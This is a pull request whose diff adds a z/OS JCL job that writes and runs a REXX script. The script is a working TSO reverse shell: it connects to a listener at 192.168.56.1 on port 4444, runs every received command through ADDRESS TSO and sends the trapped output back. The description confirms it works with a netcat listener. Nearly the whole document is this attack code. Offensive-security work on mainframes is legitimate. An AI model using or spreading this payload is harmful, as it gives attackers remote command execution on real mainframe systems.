### PR TITLE
added JCL for revtso rexx so it can be submitted

### DIFF
--- a/revtsorx.jcl
+++ b/revtsorx.jcl
@@ -1,0 +1,43 @@
+//USERJB JOB (USER),'job descript',MSGCLASS=H,
+//   NOTIFY=&SYSUID,MSGLEVEL=(1,1),REGION=0M,COND=(0,NE)
+//*
+//S1 EXEC PGM=IEBGENER
+//SYSPRINT  DD SYSOUT=*
+//SYSIN     DD DUMMY
+//SYSUT2    DD DSN=&&REXXTMP(REXXREV),SPACE=(TRK,(10,10,10)),
+//             RECFM=FB,LRECL=80,DISP=(NEW,PASS),DSNTYPE=PDS
+//SYSUT1    DD *
+  /* REXX */
+  /* TRACE i */
+  IP = '192.168.56.1'
+  PORT = '4444'
+  n = "25"x
+  rsock = SOCKET('INITIALIZE','CLIENT',2)
+  rsock = SOCKET('SOCKET',2,'STREAM','TCP')
+  parse var rsock socket_rc socketID .
+  rsock = Socket('SETSOCKOPT',socketID,'SOL_SOCKET','SO_KEEPALIVE','ON')
+  rsock = SOCKET('SETSOCKOPT',socketID,'SOL_SOCKET','SO_ASCII','On')
+  rsock = SOCKET('SOCKETSETSTATUS','CLIENT')
+  rsock = SOCKET('CONNECT',socketID,'AF_INET' PORT IP)
+  READY = "READY"|| n
+  rsock = SOCKET('SEND',socketID, READY)
+  DO FOREVER
+   in = SOCKET('RECV',socketID,10000)
+   parse var in s_rc s_data_len s_data_text
+   cmd = DELSTR(s_data_text, LENGTH(s_data_text))
+   u = OUTTRAP('tso_out.')
+   ADDRESS TSO cmd
+   u = OUTTRAP(OFF)
+   text = n
+   DO i = 1 to tso_out.0
+    text = text||tso_out.i||n
+   END
+   text = text||n||READY
+   rsock = SOCKET('SEND',socketID, text)
+  END
+  return 0
+/*
+//S2        EXEC PGM=IKJEFT01,PARM='%REXXREV'
+//SYSEXEC   DD DSN=&&REXXTMP,DISP=SHR
+//SYSTSPRT  DD SYSOUT=*
+//SYSTSIN   DD DUMMY


### PR DESCRIPTION
This JCL creates a dummy file with IEBGENER and then executes it via TSO IKJEFT01 (could use the other flavors of IKJ 1a or 1b also I suppose, but this works.

https://www.ibm.com/support/knowledgecenter/en/SSLTBW_2.1.0/com.ibm.zos.v2r1.ikjc200/jcl_exec.htm

Still works with normal netcat to catch